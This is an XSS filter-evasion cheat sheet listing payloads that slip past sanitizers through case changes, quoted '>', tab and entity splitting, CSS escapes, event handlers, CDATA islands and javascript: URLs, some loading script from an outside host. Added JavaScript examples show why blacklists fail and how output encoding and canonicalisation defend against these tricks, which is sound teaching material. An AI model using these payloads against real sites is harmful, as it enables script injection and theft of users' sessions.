1. Vary the letter case

<sCript>alert('d')</scRipT>

Tag and attribute names are case-insensitive to the HTML parser, so a case-sensitive pattern for "<script>" never fires.
2. Insert extra characters to evade regular-expression checks

<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" " SRC="t.js"></SCRIPT>
<SCRIPT "a='>'" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

A filter that ends the tag at the first ">" only sees <SCRIPT a="> and never reaches the SRC attribute; the browser's tokenizer keeps reading because that ">" is inside a quoted value. The backtick form relied on old Internet Explorer accepting ` as an attribute quote.
3. Replace the .js extension with another one

<script src="bad.jpg"></script>

The extension is irrelevant to the browser; it runs whatever the response body is. (Current browsers do refuse to execute a script whose Content-Type is an image, audio, video or text/csv type, so the server has to return something else.)
4. Put JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

xss.css, for example:

body {
    background-image: url('javascript:alert("XSS");')
}
5. Insert other characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>

"/" is an attribute separator for the HTML tokenizer, so a pattern that expects a space after "script" does not match, while the browser still sees a src attribute.
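To see what the case, quote, extension and separator tricks of sections 1, 2, 3 and 5 actually defeat, here is an added example (not code from the original post): a regex blacklist of the kind those tricks target, run against the post's own payloads, next to HTML entity encoding of the output, which neutralises every variant without having to recognise any of them. The blacklist patterns, the payload set and the escape table are assumptions chosen for illustration.

```javascript
// Added example, not code from the original post.
// A blacklist filter of the kind sections 1, 2, 3 and 5 are written to defeat,
// run against the post's own payloads, next to output encoding for contrast.

// Naive blacklist (assumed for illustration). Each pattern has a hole that one
// of the payloads exploits: pattern 1 is case-sensitive and wants a bare tag;
// pattern 2 wants whitespace after the tag name, stops attribute scanning at
// the first ">" and only looks for a ".js" extension.
const BLACKLIST = [
  /<script>/,
  /<script\s+[^>]*src\s*=\s*["'][^"']*\.js["']/i,
];

function naiveFilterBlocks(html) {
  return BLACKLIST.some((re) => re.test(html));
}

// Payloads from the sections above (constructed inline so this runs offline).
const PAYLOADS = {
  plain:        '<script>alert("d")</script>',
  plainInclude: '<script src="t.js"></script>',
  mixedCase:    '<sCript>alert("d")</scRipT>',            // section 1
  quotedGt:     '<SCRIPT a=">" SRC="t.js"></SCRIPT>',     // section 2: ">" inside a value
  backtick:     '<SCRIPT a=`>` SRC="t.js"></SCRIPT>',     // section 2: backtick delimiter
  jpgExt:       '<script src="bad.jpg"></script>',        // section 3: no .js extension
  slashSep:     '<SCRIPT/SRC="t.js"></SCRIPT>',           // section 5: "/" instead of space
  slashWord:    '<SCRIPT/anyword SRC="t.js"></SCRIPT>',   // section 5
};

// Names of the payloads the blacklist lets through.
function evasions() {
  return Object.keys(PAYLOADS).filter((k) => !naiveFilterBlocks(PAYLOADS[k]));
}

// Output encoding: the browser never sees a tag, so the payload variant is
// irrelevant. The backtick is included because old IE treated it as a quote.
const ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '`': '&#x60;',
};
function escapeHtml(s) {
  return s.replace(/[&<>"'`]/g, (c) => ESCAPES[c]);
}

// True if the string still contains something the parser would open a tag on.
function looksLikeTag(s) {
  return /<[a-zA-Z!\/]/.test(s);
}

console.log('blacklist misses:', evasions().join(', '));
console.log('encoded:', escapeHtml(PAYLOADS.quotedGt));
```

The two blocked payloads are the ones a filter author tests with; the six that slip through are exactly the sections above. Encoding at output time does not have this problem because it changes the context the browser parses in rather than guessing at the attacker's spelling.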
6. Use tabs or newlines to evade

<img src="jav ascr ipt:alert('XSS3')">    -> tab
<img src="jav ascr ipt:alert('XSS3')">    -> new line
<IMG SRC="jav ascript:alert('XSS');">

The gaps are literal tab and newline characters (they appear as spaces here). The URL parser discards ASCII tab, LF and CR anywhere in a URL before resolving it, so the browser reads javascript: while a filter matching the raw string does not.
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

In CSS a backslash before a non-hex character escapes to that character, and comments are dropped during tokenization, so expre\ssi\on and expr/*anyword*/ession are both read as expression. expression() itself only ever existed in Internet Explorer.
8. Use hex encoding to evade (the ";" closing each character reference may also be dropped)

as rendered: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

as rendered: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Characters inside attribute values can be written as HTML character references (&#x..; hex or &#..; decimal). The browser decodes them before the URL or CSS parser runs, so a filter that inspects the raw attribute text sees neither javascript: nor expression(.
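An added example (not code from the original post) that undoes the tab/newline (section 6), backslash (section 7) and hex entity (section 8) tricks before checking, which is also the check the javascript: URLs of section 14 need: it decodes HTML character references, strips the ASCII tab, LF and CR that browsers discard from URLs, unescapes CSS, and only then compares the scheme against an allowlist. The scheme allowlist, the small named-entity table and the function names are assumptions; the CSS comment stripper does not track string literals, which is a simplification.

```javascript
// Added example, not code from the original post.
// Canonicalise a URL or CSS value the way the browser will before deciding
// whether it carries script, so the tricks of sections 6, 7 and 8 are undone
// before the check rather than after it.

// HTML character references: &#x..; hex, &#..; decimal and a few named ones.
// The ";" is treated as optional, as section 8 notes. (Named table is an
// assumption; real HTML has over two thousand names.)
const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", Tab: '\t', NewLine: '\n', colon: ':' };

function decodeEntities(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (hex || dec) {
      const cp = parseInt(hex || dec, hex ? 16 : 10);
      return cp > 0x10ffff ? m : String.fromCodePoint(cp);
    }
    return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : m;
  });
}

// The URL parser drops ASCII tab, LF and CR anywhere in the input and trims
// leading/trailing C0 controls and spaces, which is why "jav<TAB>ascript:" runs.
function normalizeUrl(raw) {
  return decodeEntities(raw)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
}

// Scheme of the normalised URL in lower case, or null for a relative URL.
function schemeOf(raw) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(normalizeUrl(raw));
  return m ? m[1].toLowerCase() : null;
}

const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);   // assumed allowlist

function isSafeUrl(raw) {
  const s = schemeOf(raw);
  return s === null || SAFE_SCHEMES.has(s);
}

// What a filter that looks at the raw string does, for contrast.
function naiveIsSafeUrl(raw) {
  return !/^javascript:/i.test(raw);
}

// CSS: "\" + 1-6 hex digits (plus one optional whitespace) encodes a code
// point, "\" + any other character is that character, so expre\ssi\on
// becomes expression. Comments are removed first. Simplification: the
// comment stripper does not know about CSS string literals.
function cssUnescape(s) {
  return s
    .replace(/\/\*[\s\S]*?\*\//g, '')
    .replace(/\\([0-9a-f]{1,6})[ \t\n\r\f]?|\\([\s\S])/gi, (m, hex, ch) => {
      if (!hex) return ch;
      const cp = parseInt(hex, 16);
      return cp === 0 || cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
    });
}

// True if the unescaped CSS contains an IE expression() or a script-scheme URL.
function cssHasScript(style) {
  const css = cssUnescape(style);
  return /expression\s*\(/i.test(css)
    || /url\s*\(\s*["']?\s*javascript:/i.test(css)
    || /@import\s*["']?\s*javascript:/i.test(css);
}

for (const u of ['jav\tascr\tipt:alert(1)', 'jav&#x09;ascript:alert(1)', 'https://example.com/']) {
  console.log(JSON.stringify(u), 'naive:', naiveIsSafeUrl(u), 'normalised:', isSafeUrl(u));
}
console.log(cssUnescape("@im\\port'\\ja\\vasc\\ript:alert(1)'"));
```

The order matters: entities first, because they can encode the tab or the colon; then the whitespace stripping; then the scheme test on the result. Checking for the string "javascript:" at any earlier stage is what every payload in sections 6 to 8 is built to slip past.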
9. Script in HTML tag event handlers

<body onload="alert('onload')">

Any event-handler attribute carries script the same way. The list below is Internet Explorer's; treat every attribute whose name begins with "on" identically, including ones not listed here:

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
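An added example (not code from the original post) of the alternative to a handler blacklist: a start-tag tokenizer that follows the HTML5 rules (quoted values may contain ">", "/" separates attributes, whitespace is allowed around "=") and a single rule that rejects any attribute whose name begins with "on". The regex extractor shown for contrast and the sample tags are assumptions for illustration; attribute values are returned raw, without entity decoding.

```javascript
// Added example, not code from the original post.
// Parse a start tag with the HTML5 tokenizer rules instead of a regular
// expression, then apply one rule: no attribute whose name begins with "on".

const WS = /[\t\n\f\r ]/;

// Returns { name, attrs: [{ name, value }], end } for the start tag at
// html[0], or null if there is none. "end" is the index just past its ">".
function parseStartTag(html) {
  const m = /^<([a-zA-Z][^\t\n\f\r />]*)/.exec(html);
  if (!m) return null;
  const name = m[1].toLowerCase();
  const attrs = [];
  let i = 1 + m[1].length;
  for (;;) {
    // "before attribute name": whitespace and "/" are both separators,
    // which is why <SCRIPT/SRC=...> (section 5) still has a src attribute.
    while (i < html.length && (WS.test(html[i]) || html[i] === '/')) i++;
    if (i >= html.length) return null;                 // tag never closed
    if (html[i] === '>') return { name, attrs, end: i + 1 };
    // "attribute name": a leading "=" is taken into the name (a parse error
    // in the spec, but not a way out); then read up to ws, "/", "=", ">".
    let start = i;
    if (html[i] === '=') i++;
    while (i < html.length && !WS.test(html[i]) && !/[\/=>]/.test(html[i])) i++;
    const attrName = html.slice(start, i).toLowerCase();
    // "after attribute name": whitespace may separate the name from "=".
    while (i < html.length && WS.test(html[i])) i++;
    let value = '';
    if (html[i] === '=') {
      i++;
      while (i < html.length && WS.test(html[i])) i++;
      const q = html[i];
      if (q === '"' || q === "'") {
        // Quoted value: a ">" inside it does not end the tag (section 2).
        const close = html.indexOf(q, i + 1);
        if (close === -1) return null;
        value = html.slice(i + 1, close);
        i = close + 1;
      } else {
        // Unquoted value: runs to whitespace or ">". A backtick is an
        // ordinary character here, as in current browsers (old IE treated
        // it as a quote, which the section 2 backtick payload relied on).
        start = i;
        while (i < html.length && !WS.test(html[i]) && html[i] !== '>') i++;
        value = html.slice(start, i);
      }
    }
    attrs.push({ name: attrName, value });
  }
}

// Attribute names that would run script: every on* handler, whether or not
// it appears in the list above.
function eventHandlerAttrs(html) {
  const tag = parseStartTag(html);
  return tag ? tag.attrs.map((a) => a.name).filter((n) => n.startsWith('on')) : [];
}

// Regex extraction for contrast: cuts the tag at the first ">" and needs a
// space after the tag name, so it misses exactly the payloads above.
function regexAttrNames(html) {
  const m = /^<[a-zA-Z]+\s([^>]*)>/.exec(html);
  if (!m) return [];
  return [...m[1].matchAll(/([^\s=]+)\s*=/g)].map((x) => x[1].toLowerCase());
}

// Constructed sample tags from sections 2, 5 and 9.
const SAMPLES = [
  '<SCRIPT a=">" SRC="t.js"></SCRIPT>',
  '<SCRIPT/SRC="t.js"></SCRIPT>',
  '<body onload="alert(1)">',
  '<body/onload="alert(1)">',
  '<img src="x"onerror=alert(1)>',
];
for (const s of SAMPLES) {
  console.log(s, '| tokenizer:', parseStartTag(s).attrs.map((a) => a.name).join(','),
    '| regex:', regexAttrNames(s).join(','));
}
```

Once attributes are recovered this way, the rest is allowlisting (which tags, which attribute names) plus a scheme check on URL-valued attributes; enumerating handler names, as the list above does, is only useful for testing the filter, never for writing it.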
10. XSS code inside an SWF

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

AllowScriptAccess="always" lets the Flash movie call into the embedding page's JavaScript, so the script lives in the SWF rather than in the HTML the filter inspects.
11. Use CDATA to split the XSS code and reassemble it (Internet Explorer XML data islands)

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X></xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

The string javascript: never appears contiguously in the source; it is only assembled when the data-bound SPAN renders the field as HTML.
12. Use HTML+TIME (Internet Explorer behaviors)

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert(&quot;XSS&quot;)</SCRIPT>">
</BODY></HTML>
13. Set a cookie via META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

This plants the payload in a cookie, so any page that later reflects the cookie value without encoding it executes it.
14. javascript: in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
<IFRAME SRC=javascript:alert('XSS27')></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE>
<A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

Current browsers no longer run javascript: URLs in image sources, CSS url() or stylesheet links; they still run them in IFRAME and FRAME SRC and in A HREF, so the scheme check on URL-valued attributes matters as much as ever.